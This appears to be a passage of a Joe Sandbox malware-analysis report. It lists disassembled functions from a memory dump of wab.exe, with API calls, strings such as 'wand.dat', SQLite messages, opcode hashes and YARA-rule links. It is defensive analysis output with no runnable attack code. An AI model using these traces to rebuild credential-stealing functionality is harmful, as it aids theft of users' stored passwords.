                                                                                                                                                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                          • String ID: MS Sans Serif
                                                                                                                                                                                          • API String ID: 210187428-168460110
                                                                                                                                                                                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                          • String ID: edit
                                                                                                                                                                                          • API String ID: 2747424523-2167791130
                                                                                                                                                                                          • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                          • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                          • API String ID: 3150196962-1506664499
                                                                                                                                                                                          • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                                                          • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                          • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                                                          • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memcmp
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3384217055-0
                                                                                                                                                                                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                          • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                          • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                          • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                            • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                            • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                          • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                          • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1889144086-0
                                                                                                                                                                                          • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                          • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                          • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                          • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1661045500-0
                                                                                                                                                                                          • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                          • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                          • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0042EC7A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                          • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                          • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                          • API String ID: 1297977491-2063813899
                                                                                                                                                                                          • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                          • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                          • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                          • String ID: *.*$dat$wand.dat
                                                                                                                                                                                          • API String ID: 2618321458-1828844352
                                                                                                                                                                                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                          • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                          • _wtoi.MSVCRT ref: 00410C80
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1549203181-0
                                                                                                                                                                                          • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                          • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                          • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00412057
                                                                                                                                                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3550944819-0
                                                                                                                                                                                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3023356884-0
                                                                                                                                                                                          • Opcode ID: 04d2dee96b5e0c3aea304ed2264281ba89f9e94ec92aede7506340a7c7d04724
                                                                                                                                                                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 04d2dee96b5e0c3aea304ed2264281ba89f9e94ec92aede7506340a7c7d04724
                                                                                                                                                                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040B248
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3023356884-0
                                                                                                                                                                                          • Opcode ID: be216efb729f49d9b3453cff3a07ca29206f97cb50f4c40f8d3ab9401fa12aed
                                                                                                                                                                                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                          • Opcode Fuzzy Hash: be216efb729f49d9b3453cff3a07ca29206f97cb50f4c40f8d3ab9401fa12aed
                                                                                                                                                                                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                                                                                                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                                                          • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                          • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                          • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                          • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040B159
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1171893557-0
                                                                                                                                                                                          • Opcode ID: b35f5ae7fefd5d66d25ec59d6127a866c9c92b2d2e026b1e9a4331286ce66ec4
                                                                                                                                                                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                          • Opcode Fuzzy Hash: b35f5ae7fefd5d66d25ec59d6127a866c9c92b2d2e026b1e9a4331286ce66ec4
                                                                                                                                                                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                            • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                          • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                          • String ID:
